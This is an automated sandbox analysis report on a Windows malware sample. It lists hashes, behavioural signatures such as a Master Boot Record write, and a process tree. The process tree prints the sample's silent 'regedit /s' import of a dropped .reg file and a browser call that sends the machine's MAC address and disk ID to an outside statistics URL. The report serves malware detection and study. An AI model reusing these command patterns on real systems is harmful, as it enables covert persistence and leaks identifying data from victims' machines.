Analysis
-
max time kernel
117s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
20-04-2024 06:30
Static task
static1
Behavioral task
behavioral1
Sample
fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
Resource
win10v2004-20240412-en
General
-
Target
fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
-
Size
60KB
-
MD5
fc239744bad8d8efbe1ff2db4efc21bd
-
SHA1
6ebecbe46a6deb33c113a3e90a5e853b264d730b
-
SHA256
eb046e06154fee919638727f5d53ee724da02a9db31a14fc6db9d917de208de4
-
SHA512
166805c0e462589797e6ad6fe0b69a9cf437a2c1051a93537d5ecfc1cf493b7156e6d65b2ebe1d2eef523f2a2fa5677a8d9bef2b79ecd39da2b78eae9ab40286
-
SSDEEP
768:VcYzYhaPMn84kg57lCeq1wonniiJMbO163IAVzP4/qn6MIMJy5rd/D:S0YhaPMaolChf12IAZP6qnet5rd7
Malware Config
Signatures
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exedescription ioc process File opened for modification \??\PhysicalDrive0 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6B30F221-FEDF-11EE-9066-F6F8CE09FCD4} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Modifies registry class 14 IoCs
Processes:
regedit.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec\ = "[]" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command\ = "%SystemRoot%\\Explorer.exe /idlist,%I,%L" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application\ = "Folders" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic\ = "AppProperties" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ = "[ViewFolder(\"%l\", %I, %S)]" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\NoActivateHandler regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\BrowserFlags = "16" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ExplorerFlags = "18" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command regedit.exe -
Runs .reg file with regedit 1 IoCs
Processes:
regedit.exepid process 3068 regedit.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exepid process 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1644 iexplore.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exeiexplore.exeIEXPLORE.EXEpid process 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe 1644 iexplore.exe 1644 iexplore.exe 2788 IEXPLORE.EXE 2788 IEXPLORE.EXE 2788 IEXPLORE.EXE 2788 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.execmd.exeiexplore.exedescription pid process target process PID 1392 wrote to memory of 2192 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe cmd.exe PID 1392 wrote to memory of 2192 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe cmd.exe PID 1392 wrote to memory of 2192 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe cmd.exe PID 1392 wrote to memory of 2192 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe cmd.exe PID 1392 wrote to memory of 1644 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe iexplore.exe PID 1392 wrote to memory of 1644 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe iexplore.exe PID 1392 wrote to memory of 1644 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe iexplore.exe PID 1392 wrote to memory of 1644 1392 fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe iexplore.exe PID 2192 wrote to memory of 3068 2192 cmd.exe regedit.exe PID 2192 wrote to memory of 3068 2192 cmd.exe regedit.exe PID 2192 wrote to memory of 3068 2192 cmd.exe regedit.exe PID 2192 wrote to memory of 3068 2192 cmd.exe regedit.exe PID 1644 wrote to memory of 2788 1644 iexplore.exe IEXPLORE.EXE PID 1644 wrote to memory of 2788 1644 iexplore.exe IEXPLORE.EXE PID 1644 wrote to memory of 2788 1644 iexplore.exe IEXPLORE.EXE PID 1644 wrote to memory of 2788 1644 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"3⤵
- Modifies registry class
- Runs .reg file with regedit
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=F6F8CE09FCD4&Hard=QM00013&ClientType=Home&Process=29&UserID=0040&Authen=844-4652⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1644 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\getback.regFilesize
1KB
MD5626e2d76f5c328d57a3eff6a7f94d129
SHA1210fd33fa005775b30a8fd40a065a2e788934216
SHA2565d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e
SHA512629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1
-
memory/1392-0-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/1392-27-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB